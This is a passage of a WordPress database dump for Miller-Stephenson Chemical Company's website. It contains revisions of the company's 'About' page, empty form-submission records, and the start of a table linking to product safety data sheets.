INSERT INTO `wp_posts` VALUES (3540, 2, '2017-02-01 13:57:53', '2017-02-01 13:57:53', '[row]\r\n\r\n[col span="4"]\r\n\r\n<strong>On The Cutting Edge of the Performance Chemical Market</strong>\r\n\r\nMiller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors.  Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base.  Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements.  We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution.  If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.\r\n\r\n[/col]\r\n[col span="9"]\r\n\r\nhttps://www.youtube.com/watch?v=tbzqYPsuauI&feature=youtu.be\r\n\r\n[/col]\r\n[col]\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\nLooking back at over 60 years of success, Miller-Stephenson provides superior chemical solutions for a wide range of industries. We are committed to providing customers with industry-leading customer service, delivery and technical support to ensure our customers are successful. We strategically maintain four facilities throughout the United States and Canada to ensure prompt customer service and efficient delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Customer Service Department.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4"]\r\n\r\n[ux_image id="1054"]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_image id="142"]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_image id="87"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2017-02-01 13:57:53', '2017-02-01 13:57:53', '', 204, 'https://www.miller-stephenson.com/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3541, 2, '2017-02-01 14:00:16', '2017-02-01 14:00:16', '[row]\n\n[col span="5"]\n\n<p><strong>On The Cutting Edge of the Performance Chemical Market</strong></p>\n<p>Miller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors.  Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base.  Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements.  We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution.  If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.</p>\n\n[/col]\n[col span="9"]\n\n<p>https://www.youtube.com/watch?v=tbzqYPsuauI&feature=youtu.be</p>\n\n[/col]\n[col]\n\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\n<p>Looking back at over 60 years of success, Miller-Stephenson provides superior chemical solutions for a wide range of industries. We are committed to providing customers with industry-leading customer service, delivery and technical support to ensure our customers are successful. We strategically maintain four facilities throughout the United States and Canada to ensure prompt customer service and efficient delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Customer Service Department.</p>\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4"]\n\n[ux_image id="1054"]\n\n\n[/col]\n[col span="4"]\n\n[ux_image id="142"]\n\n\n[/col]\n[col span="4"]\n\n[ux_image id="87"]\n\n\n[/col]\n\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2017-02-01 14:00:16', '2017-02-01 14:00:16', '', 204, 'https://www.miller-stephenson.com/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3542, 2, '2017-02-01 14:11:40', '2017-02-01 14:11:40', '[row]\r\n\r\n[col span="5"]\r\n\r\n<strong>On The Cutting Edge of the Performance Chemical Market</strong>\r\n\r\nMiller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors.  Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base.  Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements.  We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution.  If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.\r\n\r\n[/col]\r\n[col span="7"]\r\n\r\nhttps://www.youtube.com/watch?v=tbzqYPsuauI&feature=youtu.be\r\n\r\n[/col]\r\n[col]\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\nLooking back at over 60 years of success, Miller-Stephenson provides superior chemical solutions for a wide range of industries. We are committed to providing customers with industry-leading customer service, delivery and technical support to ensure our customers are successful. We strategically maintain four facilities throughout the United States and Canada to ensure prompt customer service and efficient delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Customer Service Department.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4"]\r\n\r\n[ux_image id="1054"]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_image id="142"]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_image id="87"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2017-02-01 14:11:40', '2017-02-01 14:11:40', '', 204, 'https://www.miller-stephenson.com/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3543, 2, '2017-02-01 14:24:37', '2017-02-01 14:24:37', '[row]\n\n[col span="5"]\n\n<p><strong>On The Cutting Edge of the Performance Chemical Market</strong></p>\n<p>Miller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors.  Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base.  Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements.  We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution.  If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.</p>\n\n[/col]\n[col span="7"]\n\n<p>https://www.youtube.com/watch?v=tbzqYPsuauI&feature=youtu.be</p>\n\n[/col]\n[col]\n\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\n<p>Looking back at over 60 years of success, Miller-Stephenson provides superior chemical solutions for a wide range of industries. We are committed to providing customers with industry-leading customer service, delivery and technical support to ensure our customers are successful. We strategically maintain four facilities throughout the United States and Canada to ensure prompt customer service and efficient delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Customer Service Department.</p>\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4"]\n\n[ux_image id="1054"]\n\n\n[/col]\n[col span="4"]\n\n[ux_image id="142"]\n\n\n[/col]\n[col span="4"]\n\n[ux_image id="87"]\n\n\n[/col]\n\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2017-02-01 14:24:37', '2017-02-01 14:24:37', '', 204, 'https://www.miller-stephenson.com/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3544, 2, '2017-02-01 14:45:18', '2017-02-01 14:45:18', '[row]\r\n\r\n[col span="5"]\r\n\r\n<strong>On The Cutting Edge of the Performance Chemical Market</strong>\r\n\r\nMiller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors.  Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base.  Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements.  We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution.  If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.\r\n\r\n[/col]\r\n\r\n<iframe width="560" height="315" src="https://www.youtube.com/embed/tbzqYPsuauI" frameborder="0" allowfullscreen></iframe>\r\n\r\n[col]\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\nLooking back at over 60 years of success, Miller-Stephenson provides superior chemical solutions for a wide range of industries. We are committed to providing customers with industry-leading customer service, delivery and technical support to ensure our customers are successful. We strategically maintain four facilities throughout the United States and Canada to ensure prompt customer service and efficient delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Customer Service Department.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4"]\r\n\r\n[ux_image id="1054"]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_image id="142"]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_image id="87"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2017-02-01 14:45:18', '2017-02-01 14:45:18', '', 204, 'https://www.miller-stephenson.com/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3545, 0, '2017-02-01 15:54:17', '2017-02-01 15:54:17', '', '', '', 'publish', 'closed', 'closed', '', '3545', '', '', '2017-02-01 15:54:17', '2017-02-01 15:54:17', '', 0, 'https://www.miller-stephenson.com/nf_sub/3545/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3546, 0, '2017-02-01 16:36:50', '2017-02-01 16:36:50', '', '', '', 'publish', 'closed', 'closed', '', '3546', '', '', '2017-02-01 16:36:51', '2017-02-01 16:36:51', '', 0, 'https://www.miller-stephenson.com/nf_sub/3546/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3547, 0, '2017-02-01 16:38:38', '2017-02-01 16:38:38', '', '', '', 'publish', 'closed', 'closed', '', '3547', '', '', '2017-02-01 16:38:38', '2017-02-01 16:38:38', '', 0, 'https://www.miller-stephenson.com/nf_sub/3547/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3548, 0, '2017-02-01 16:50:58', '2017-02-01 16:50:58', '', '', '', 'publish', 'closed', 'closed', '', '3548', '', '', '2017-02-01 16:50:58', '2017-02-01 16:50:58', '', 0, 'https://www.miller-stephenson.com/nf_sub/3548/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3549, 0, '2017-02-01 17:14:18', '2017-02-01 17:14:18', '', '', '', 'publish', 'closed', 'closed', '', '3549', '', '', '2017-02-01 17:14:18', '2017-02-01 17:14:18', '', 0, 'https://www.miller-stephenson.com/nf_sub/3549/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3550, 0, '2017-02-01 17:54:36', '2017-02-01 17:54:36', '', '', '', 'publish', 'closed', 'closed', '', '3550', '', '', '2017-02-01 17:54:36', '2017-02-01 17:54:36', '', 0, 'https://www.miller-stephenson.com/nf_sub/3550/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3551, 0, '2017-02-01 18:27:07', '2017-02-01 18:27:07', '', '', '', 'publish', 'closed', 'closed', '', '3551', '', '', '2017-02-01 18:27:07', '2017-02-01 18:27:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/3551/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3552, 0, '2017-02-01 20:36:48', '2017-02-01 20:36:48', '', '', '', 'publish', 'closed', 'closed', '', '3552', '', '', '2017-02-01 20:36:48', '2017-02-01 20:36:48', '', 0, 'https://www.miller-stephenson.com/nf_sub/3552/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3553, 0, '2017-02-01 22:27:05', '2017-02-01 22:27:05', '', '', '', 'publish', 'closed', 'closed', '', '3553', '', '', '2017-02-01 22:27:05', '2017-02-01 22:27:05', '', 0, 'https://www.miller-stephenson.com/nf_sub/3553/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3554, 0, '2017-02-02 14:15:18', '2017-02-02 14:15:18', '', '', '', 'publish', 'closed', 'closed', '', '3554', '', '', '2017-02-02 14:15:19', '2017-02-02 14:15:19', '', 0, 'https://www.miller-stephenson.com/nf_sub/3554/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3555, 0, '2017-02-02 15:36:20', '2017-02-02 15:36:20', '', '', '', 'publish', 'closed', 'closed', '', '3555', '', '', '2017-02-02 15:36:21', '2017-02-02 15:36:21', '', 0, 'https://www.miller-stephenson.com/nf_sub/3555/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3556, 0, '2017-02-02 19:28:38', '2017-02-02 19:28:38', '', '', '', 'publish', 'closed', 'closed', '', '3556', '', '', '2017-02-02 19:28:39', '2017-02-02 19:28:39', '', 0, 'https://www.miller-stephenson.com/nf_sub/3556/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3557, 0, '2017-02-02 19:32:08', '2017-02-02 19:32:08', '', '', '', 'publish', 'closed', 'closed', '', '3557', '', '', '2017-02-02 19:32:08', '2017-02-02 19:32:08', '', 0, 'https://www.miller-stephenson.com/nf_sub/3557/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3558, 0, '2017-02-02 20:18:03', '2017-02-02 20:18:03', '', '', '', 'publish', 'closed', 'closed', '', '3558', '', '', '2017-02-02 20:18:03', '2017-02-02 20:18:03', '', 0, 'https://www.miller-stephenson.com/nf_sub/3558/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3559, 0, '2017-02-02 22:19:02', '2017-02-02 22:19:02', '', '', '', 'publish', 'closed', 'closed', '', '3559', '', '', '2017-02-02 22:19:03', '2017-02-02 22:19:03', '', 0, 'https://www.miller-stephenson.com/nf_sub/3559/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3560, 0, '2017-02-03 08:05:25', '2017-02-03 08:05:25', '', '', '', 'publish', 'closed', 'closed', '', '3560', '', '', '2017-02-03 08:05:26', '2017-02-03 08:05:26', '', 0, 'https://www.miller-stephenson.com/nf_sub/3560/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3561, 0, '2017-02-03 13:59:39', '2017-02-03 13:59:39', '', '', '', 'publish', 'closed', 'closed', '', '3561', '', '', '2017-02-03 13:59:39', '2017-02-03 13:59:39', '', 0, 'https://www.miller-stephenson.com/nf_sub/3561/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3562, 0, '2017-02-03 14:35:01', '2017-02-03 14:35:01', '', '', '', 'publish', 'closed', 'closed', '', '3562', '', '', '2017-02-03 14:35:01', '2017-02-03 14:35:01', '', 0, 'https://www.miller-stephenson.com/nf_sub/3562/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3563, 0, '2017-02-03 15:22:27', '2017-02-03 15:22:27', '', '', '', 'publish', 'closed', 'closed', '', '3563', '', '', '2017-02-03 15:22:27', '2017-02-03 15:22:27', '', 0, 'https://www.miller-stephenson.com/nf_sub/3563/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3564, 0, '2017-02-03 17:28:43', '2017-02-03 17:28:43', '', '', '', 'publish', 'closed', 'closed', '', '3564', '', '', '2017-02-03 17:28:43', '2017-02-03 17:28:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/3564/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3565, 0, '2017-02-06 04:40:26', '2017-02-06 04:40:26', '', '', '', 'publish', 'closed', 'closed', '', '3565', '', '', '2017-02-06 04:40:27', '2017-02-06 04:40:27', '', 0, 'https://www.miller-stephenson.com/nf_sub/3565/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3567, 0, '2017-02-06 15:51:10', '2017-02-06 15:51:10', '', '', '', 'publish', 'closed', 'closed', '', '3567', '', '', '2017-02-06 15:51:10', '2017-02-06 15:51:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/3567/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3568, 0, '2017-02-06 17:48:30', '2017-02-06 17:48:30', '', '', '', 'publish', 'closed', 'closed', '', '3568', '', '', '2017-02-06 17:48:31', '2017-02-06 17:48:31', '', 0, 'https://www.miller-stephenson.com/nf_sub/3568/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3569, 0, '2017-02-06 17:52:56', '2017-02-06 17:52:56', '', '', '', 'publish', 'closed', 'closed', '', '3569', '', '', '2017-02-06 17:52:56', '2017-02-06 17:52:56', '', 0, 'https://www.miller-stephenson.com/nf_sub/3569/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3570, 0, '2017-02-06 18:11:43', '2017-02-06 18:11:43', '', '', '', 'publish', 'closed', 'closed', '', '3570', '', '', '2017-02-06 18:11:44', '2017-02-06 18:11:44', '', 0, 'https://www.miller-stephenson.com/nf_sub/3570/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3571, 0, '2017-02-06 19:26:15', '2017-02-06 19:26:15', '', '', '', 'publish', 'closed', 'closed', '', '3571', '', '', '2017-02-06 19:26:15', '2017-02-06 19:26:15', '', 0, 'https://www.miller-stephenson.com/nf_sub/3571/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3572, 0, '2017-02-07 08:38:58', '2017-02-07 08:38:58', '', '', '', 'publish', 'closed', 'closed', '', '3572', '', '', '2017-02-07 08:38:58', '2017-02-07 08:38:58', '', 0, 'https://www.miller-stephenson.com/nf_sub/3572/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3574, 416, '2017-02-07 16:30:31', '2017-02-07 16:30:31', '', '', '', 'publish', 'closed', 'closed', '', '3574', '', '', '2017-02-07 16:30:31', '2017-02-07 16:30:31', '', 0, 'https://www.miller-stephenson.com/nf_sub/3574/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3575, 0, '2017-02-07 20:15:06', '2017-02-07 20:15:06', '', '', '', 'publish', 'closed', 'closed', '', '3575', '', '', '2017-02-07 20:15:06', '2017-02-07 20:15:06', '', 0, 'https://www.miller-stephenson.com/nf_sub/3575/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3576, 0, '2017-02-07 20:37:43', '2017-02-07 20:37:43', '', '', '', 'publish', 'closed', 'closed', '', '3576', '', '', '2017-02-07 20:37:43', '2017-02-07 20:37:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/3576/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3577, 0, '2017-02-07 22:15:49', '2017-02-07 22:15:49', '', '', '', 'publish', 'closed', 'closed', '', '3577', '', '', '2017-02-07 22:15:50', '2017-02-07 22:15:50', '', 0, 'https://www.miller-stephenson.com/nf_sub/3577/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3578, 0, '2017-02-08 03:34:28', '2017-02-08 03:34:28', '', '', '', 'publish', 'closed', 'closed', '', '3578', '', '', '2017-02-08 03:34:29', '2017-02-08 03:34:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/3578/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3579, 0, '2017-02-08 13:55:41', '2017-02-08 13:55:41', '', '', '', 'publish', 'closed', 'closed', '', '3579', '', '', '2017-02-08 13:55:41', '2017-02-08 13:55:41', '', 0, 'https://www.miller-stephenson.com/nf_sub/3579/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3580, 0, '2017-02-08 14:25:46', '2017-02-08 14:25:46', '', '', '', 'publish', 'closed', 'closed', '', '3580', '', '', '2017-02-08 14:25:46', '2017-02-08 14:25:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/3580/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3581, 0, '2017-02-08 15:31:01', '2017-02-08 15:31:01', '', '', '', 'publish', 'closed', 'closed', '', '3581', '', '', '2017-02-08 15:31:01', '2017-02-08 15:31:01', '', 0, 'https://www.miller-stephenson.com/nf_sub/3581/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3582, 0, '2017-02-08 16:36:42', '2017-02-08 16:36:42', '', '', '', 'publish', 'closed', 'closed', '', '3582', '', '', '2017-02-08 16:36:42', '2017-02-08 16:36:42', '', 0, 'https://www.miller-stephenson.com/nf_sub/3582/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3583, 0, '2017-02-08 19:36:42', '2017-02-08 19:36:42', '', '', '', 'publish', 'closed', 'closed', '', '3583', '', '', '2017-02-08 19:36:42', '2017-02-08 19:36:42', '', 0, 'https://www.miller-stephenson.com/nf_sub/3583/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3584, 0, '2017-02-09 09:27:33', '2017-02-09 09:27:33', '', '', '', 'publish', 'closed', 'closed', '', '3584', '', '', '2017-02-09 09:27:33', '2017-02-09 09:27:33', '', 0, 'https://www.miller-stephenson.com/nf_sub/3584/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3585, 0, '2017-02-09 13:46:19', '2017-02-09 13:46:19', '', '', '', 'publish', 'closed', 'closed', '', '3585', '', '', '2017-02-09 13:46:19', '2017-02-09 13:46:19', '', 0, 'https://www.miller-stephenson.com/nf_sub/3585/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3586, 1, '2017-02-09 14:05:56', '2017-02-09 14:05:56', '<h1>Miller-Stephenson SDS database.</h1>\r\nIf you are unable to locate the specific SDS you need, please contact our Technical Support at support@mschem.com or 800-743-4447 (8-4 E.T.)\r\n<table width="1119">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="219"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Liquid</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Release Agents</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Conformal Coatings</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Krytox</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Epoxy</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/124H.pdf">MS-124H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/111.pdf">MS-111</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122AD.pdf">MS-122AD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/452N.pdf">MS-452N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AGL683.pdf">AGL 683</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/900.pdf">MS-900</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222L.pdf">MS-222L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/114C.pdf">MS-114C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ADRED.pdf">MS-122AD RED</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/460H.pdf">MS-460H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AT.pdf">AT</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/905A.pdf">MS-905 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/115.pdf">MS-115</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ADL.pdf">MS-122ADL</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/462H.pdf">MS-462H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/ATA.pdf">ATA</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/905B.pdf">MS-905 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222T</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/182SD.pdf">MS-182SD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122AV.pdf">MS-122AV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/465C.pdf">MS-465C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2A45.pdf">AUT 2A45</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/907A.pdf">MS-907 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222F</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/126H.pdf">MS-126H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122E.pdf">MS-122E</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/467C.pdf">MS-467C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT523.pdf">AUT 523</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/907B.pdf">MS-907 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242L.pdf">MS-242L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/126HUV.pdf">MS-126HUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ERED.pdf">MS-122E RED</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/470C-16.pdf">MS-470C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT1045.pdf">AUT 1045</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/908A.pdf">MS-908 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242NAS.pdf">MS-242L-AS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/383A.pdf">MS-383A</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122SE.pdf">MS-122SE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/472S-16.pdf">MS-472S</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2045.pdf">AUT 2045</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/908B.pdf">MS-908 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242N.pdf">MS-242N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/383H.pdf">MS-383H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122SD.pdf">MS-122SD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/470S-16.pdf">MS-470S</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2245.pdf">AUT 2245</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/910A.pdf">MS-910 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242NAS.pdf">MS-242N-AS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/383HUV.pdf">MS-383HUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122XD.pdf">MS-122XD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/472S.pdf">MS-472S</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143.pdf">143 SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/910B.pdf">MS-910 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381H.pdf">MS-381H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/252.pdf">MS-252</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/132FE.pdf">MS-132FE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/475C.pdf">MS-475C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL10X.pdf">GPL 10X SERIES</a></td>\r\n<td style="text-align: center;"><a 